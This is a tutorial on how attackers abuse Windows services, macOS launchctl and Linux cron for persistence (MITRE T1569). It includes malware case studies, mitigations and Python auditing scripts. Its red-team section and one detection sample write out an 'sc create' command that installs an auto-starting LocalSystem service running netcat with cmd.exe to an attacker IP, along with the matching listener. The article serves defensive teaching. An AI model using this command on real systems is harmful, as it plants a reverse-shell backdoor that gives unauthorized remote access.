Abusing System Services [T1569] to maintain persistence
Before automation, people spent their time on manual work such as checking for updates and running monthly or weekly backups. System services, cron jobs and launchctl brought a solution to this manual work, and they are considered an evolution of automation.
Even though these techniques provide automation, they seem to be among the most vulnerable things for attackers to exploit. Adversaries usually target this type of automation on various platforms to intrude into the internal network. Still, many security professionals find it very difficult to apply mitigation and detection to these types of attacks.
What is a system service?
A system service is a special program that typically starts when the Windows operating system loads and runs automatically and continuously in the background [without user interaction] when the user has logged in to their system.
Adversaries may abuse system services to execute malicious commands or programs, such as deploying a backdoor or executing PowerShell commands. This is more difficult to detect because all the malicious activity happens in the background, where even the system user can't find any changes.
When a crafted malicious system-level process gets executed repeatedly, it keeps running in the background, wasting your resources and slowing your computer down. It can also be the gateway for the attacker to execute malicious commands: once the attacker gets initial access, he/she needs some medium to execute malicious commands, and the system service acts as an intermediary between the attacker and the victim.
What is System32?
The System32 directory is located at C:\Windows\System32. It is a directory that stores all the Windows system files and software program files. The most common types of files found in the System32 directory are DLL (Dynamic Link Library) and EXE (executable) files.
By default, all the system service files are stored in System32.
According to the MITRE ATT&CK framework, System Services [T1569] falls under the Execution phase, whose techniques result in adversary-controlled code running on a local or remote system.
Service execution [T1569.002]
Adversaries tend to create a malicious service on the target system that gets executed whenever the user turns on the machine. System services are built-in functionality of the Windows operating system, and there are predefined commands for creating and configuring services. Some of the sc service commands are:
- sc config //Configures service startup and login accounts
- sc continue //Resumes a paused service
- sc enumdepend //Lists the services that cannot run unless the specified service is running
- sc failure //Specifies what action to take upon failure of the service
- sc pause //Pauses a service
launchctl is a built-in macOS utility that runs processes on your system at a scheduled time. launchctl differentiates between agents and daemons, which are its two main components.
By loading or reloading agents or daemons, adversaries can install persistence or execute changes they made. They can even abuse this functionality to execute code or bypass some applications.
Some of the popular launchctl commands are listed below:
- $ launchctl list [Getting information about available (loaded) jobs]
- $ launchctl list | grep <LABEL> [Getting information about a given job]
- $ launchctl load /Library/LaunchDaemons/<LABEL>.plist [Loading a job (a global daemon)]
- $ launchctl unload /Library/LaunchDaemons/<LABEL>.plist [Unloading a job (a global daemon)]
- $ launchctl start <LABEL> [Starting a job (a loaded job)]
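For defenders, the same job definitions that launchctl loads can be reviewed offline. The following is an added example, not code from the original article: it reads launchd property lists with Python's plistlib and reports jobs worth a closer look. The labels, paths and the heuristics themselves are assumptions made for illustration.

```python
import plistlib
from pathlib import PurePosixPath

# Locations any local user can write to (illustrative, not exhaustive).
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")

def audit_job(plist_path, raw):
    """Return review findings for one launchd job definition (plist bytes)."""
    job = plistlib.loads(raw)
    path = PurePosixPath(plist_path)
    args = job.get("ProgramArguments") or []
    program = job.get("Program") or (args[0] if args else "")
    findings = []
    # Jobs are conventionally stored as <Label>.plist; a mismatch merits a look.
    if job.get("Label") != path.stem:
        findings.append("Label does not match plist file name")
    if program.startswith(WRITABLE_PREFIXES):
        findings.append("program in a world-writable location")
    if any(part.startswith(".") for part in PurePosixPath(program).parts):
        findings.append("program path has a hidden component")
    # RunAtLoad/KeepAlive are what make the job start (and restart) by itself.
    if findings and (job.get("RunAtLoad") or job.get("KeepAlive")):
        kind = "daemon" if "LaunchDaemons" in path.parts else "agent"
        findings.append(f"starts automatically as a {kind}")
    return findings

# Constructed sample jobs (hypothetical labels and paths).
SUSPECT = plistlib.dumps({
    "Label": "com.example.helper",
    "ProgramArguments": ["/Users/Shared/.cache/updater", "--quiet"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backupd", "--daily"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for name, raw in (("/Library/LaunchDaemons/com.example.updater.plist", SUSPECT),
                      ("/Library/LaunchDaemons/com.example.backup.plist", BENIGN)):
        print(name, audit_job(name, raw) or "no findings")
```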
Cron is a time-based job scheduler in the Linux operating system with which the user can schedule jobs to run periodically at a fixed time, date and interval. It requires root privilege. We can automate our work based on time, for example every hour or every minute.
Example : @monthly /home/sample/bin/tape-backup //Backup
Cron jobs can be configured by year, month, date and time, and they execute periodically based on the user-defined rules.
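To audit what cron will run and as whom, the entries can be parsed and normalised. This is an added example, not part of the original article: it assumes the system crontab layout (/etc/crontab style, where a user field precedes the command), expands nicknames such as @monthly into their five-field schedule, and lists root jobs whose program sits in a directory a non-root user could modify.

```python
# Schedule nicknames and the five-field schedules they stand for.
NICKNAMES = {
    "@yearly": "0 0 1 1 *", "@annually": "0 0 1 1 *", "@monthly": "0 0 1 * *",
    "@weekly": "0 0 * * 0", "@daily": "0 0 * * *", "@midnight": "0 0 * * *",
    "@hourly": "0 * * * *", "@reboot": "@reboot",
}
# Directories a non-root user can usually write to (assumption for this example).
USER_WRITABLE = ("/home/", "/tmp/", "/var/tmp/")

def parse_system_crontab(text):
    """Parse /etc/crontab-style lines: <schedule> <user> <command>."""
    jobs = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank line, comment, or environment setting
        if fields[0].startswith("@"):
            schedule, rest = NICKNAMES.get(fields[0].lower()), fields[1:]
        else:
            schedule, rest = " ".join(fields[:5]), fields[5:]
        if schedule is None or len(rest) < 2:
            continue  # unknown nickname or incomplete entry
        jobs.append({"schedule": schedule, "user": rest[0],
                     "command": " ".join(rest[1:])})
    return jobs

def risky_root_jobs(jobs):
    """Root jobs whose program lives where a non-root user could replace it."""
    return [j for j in jobs
            if j["user"] == "root" and j["command"].startswith(USER_WRITABLE)]

# Constructed sample; the first job reuses the path from the example above.
SAMPLE = """\
# /etc/crontab (constructed)
PATH=/usr/sbin:/usr/bin
@monthly root /home/sample/bin/tape-backup
17 * * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * sample /home/sample/bin/sync
"""

if __name__ == "__main__":
    for job in risky_root_jobs(parse_system_crontab(SAMPLE)):
        print(job)
```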
Threat Vulnerability and Impact
Let us discuss the threat, the vulnerability and its impact.
Vulnerability: Excess of privilege
Impact: Execution of malicious command or privilege escalation or gain persistence, Backdoors
Backdoors are generally classified as Trojans. A Trojan is a malicious computer program pretending to be something legitimate. If the targeted victim downloads or executes the program, he/she gets infected with a malicious service that executes in the background and acts as an intermediary between the attacker and the victim.
SRVHOST is a type of trojan that typically runs in the background and consumes a lot of RAM, and it is more difficult to identify. Some malware, like Wacatac, is used as a backdoor through which attackers can steal confidential information such as passwords.
List of some top backdoors
Let us list the top 10 backdoors commonly used by attackers.
The above-mentioned are some malicious Windows backdoors. If your system has been affected by any of these backdoors, you can observe it in Windows services, where it will keep running continuously as a background service. Some of the services there are actually legitimate: for example, when you run Office, ctfmon.exe starts to execute by default and keeps running in the background even after you quit all Office programs, which can seem to be a backdoor.
In August 2012, an attack campaign known as Shamoon targeted a Saudi Arabian energy company to deliver a malware called Disttrack. Disttrack is a multipurpose tool that exhibits worm-like behaviour by attempting to spread to other systems on a local network using stolen administrator credentials. More importantly, its claim to fame is the ability to destroy data and to render infected systems unusable. The attack four years ago resulted in 30,000 or more systems being damaged.
Disttrack is mainly focused on data destruction and attempting to damage as many systems as possible. To do so, this malware attempts to spread to other systems on the network using what is likely stolen administrator credentials.
BBSRAT is typically packaged within a portable executable file, although in a few of the observed instances, a raw DLL was discovered to contain BBSRAT. When the dropper first runs, it will generate a path in the %TEMP% directory. The generated filename is 10-16 uppercase alphabetic characters, and ends with a ‘.TMP’ file extension. The dropper will continue to write an embedded cab file in this location.
The malware will proceed to create one of the following directories depending on what version of Microsoft Windows is running on the target machine:
- %ALLUSERSPROFILE%\Application Data\SSONSVR
In order to ensure persistence, the following registry key is written on the victim’s machine
In this scenario, the attacker tries to establish reverse connectivity with the target system by creating a backdoor service using Netcat. Generally, this backdoor gets executed when the system is logged on, and it does not require any authentication.
- The adversaries successfully intrude into the internal network.
- Later, the attacker creates a malicious backdoor on the target system, which gets executed continuously and frequently when the user logs on.
- In this attack scenario, the adversaries create a malicious Netcat command that establishes a reverse connection between the attacker and the victim to maintain persistence on the target system.
Red team: Attack scenario
Attacker IP: 192.168.43.87
Target IP: 192.168.43.163
Let us assume that the attacker has successfully gained initial access to the target system, for example RDP or SSH access. He/she then deploys a system service on the target machine, which establishes a reverse connection to the attacker's system.
Note: this command needs administrative privilege.
C:\> sc create evil binpath= "c:\tools\nc 192.168.43.87 4444 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""
Using the built-in sc command, we have created the Netcat service, which establishes a connection to 192.168.43.87 on port 4444.
Note: Netcat is a network utility used for establishing TCP/UDP connectivity. Netcat can be used as a port scanner, a backdoor, a port redirector, a port listener and lots of other cool things too.
Step : 2
We can observe that the service named evil is running as a background service.
nc -lvp 4444
The attacker keeps listening on port 4444. When the target logs on to the system, the malicious service named "evil" gets executed automatically and opens a connection on port 4444.
The adversary can successfully execute malicious code on a local or remote system, which may result in taking over the entire server and even escalating privileges.
- Antivirus and antimalware: Using advanced antivirus and antimalware software helps you prevent malicious activities.
- Regular system audit: Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
- Update patches: Perform regular software updates to mitigate exploitation risk.
- User account management: Configure Windows User Account Control to mitigate the risk of adversaries obtaining elevated process access
- Restrict files and directory permission
- Privilege account management
- Limited access: Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include the use of network concentrators, RDP gateways, etc.
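As a detection-side complement to the regular system audit item, the following added example (not code from the original article) parses `sc create` command lines, as they would appear in process-creation logging, and explains why a new service deserves review. The trusted directories, the interpreter list and the benign sample are assumptions made for illustration.

```python
import re

# sc.exe writes options as `name= value`; the value may be quoted.
CREATE = re.compile(r'\bsc(?:\.exe)?"?\s+(?:\\\\\S+\s+)?create\s+("[^"]+"|\S+)', re.I)
OPTION = re.compile(r'(\w+)=\s*(?:"([^"]*)"|(\S+))')
# Illustrative heuristics (assumptions for this example), not a complete rule set.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\",
                "c:\\program files (x86)\\")
INTERPRETERS = ("cmd.exe", "powershell", "pwsh", "wscript", "cscript", "mshta")

def parse_sc_create(cmdline):
    """Extract name, binPath, start type and account from an `sc create` line."""
    m = CREATE.search(cmdline)
    if m is None:
        return None
    opts = {k.lower(): (q or u) for k, q, u in OPTION.findall(cmdline[m.end():])}
    return {"name": m.group(1).strip('"'),
            "binpath": opts.get("binpath", ""),
            "start": opts.get("start", "demand").lower(),        # sc default
            "account": opts.get("obj", "LocalSystem").lower()}   # sc default

def review(cmdline):
    """Return (service name, reasons) or None if the line is not `sc create`."""
    svc = parse_sc_create(cmdline)
    if svc is None:
        return None
    binpath, reasons = svc["binpath"].lower(), []
    if not binpath.startswith(TRUSTED_DIRS):
        reasons.append("binary outside System32/Program Files")
    if any(name in binpath for name in INTERPRETERS):
        reasons.append("binPath launches a command interpreter")
    if reasons and svc["start"] in ("auto", "delayed-auto") \
            and svc["account"] == "localsystem":
        reasons.append("starts automatically as LocalSystem")
    return svc["name"], reasons

# Constructed process-creation command lines; the first is the command shown above.
SAMPLES = [
    r'sc create evil binpath= "c:\tools\nc 192.168.43.87 4444 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""',
    r'sc.exe create BackupAgent binPath= "C:\Program Files\Backup\agent.exe" start= auto',
    r'sc query evil',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(review(line))
```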
System Services is one of the attack techniques that the MITRE ATT&CK Matrix lists as an Execution technique. It provides the attacker with unauthorized remote access to a compromised PC.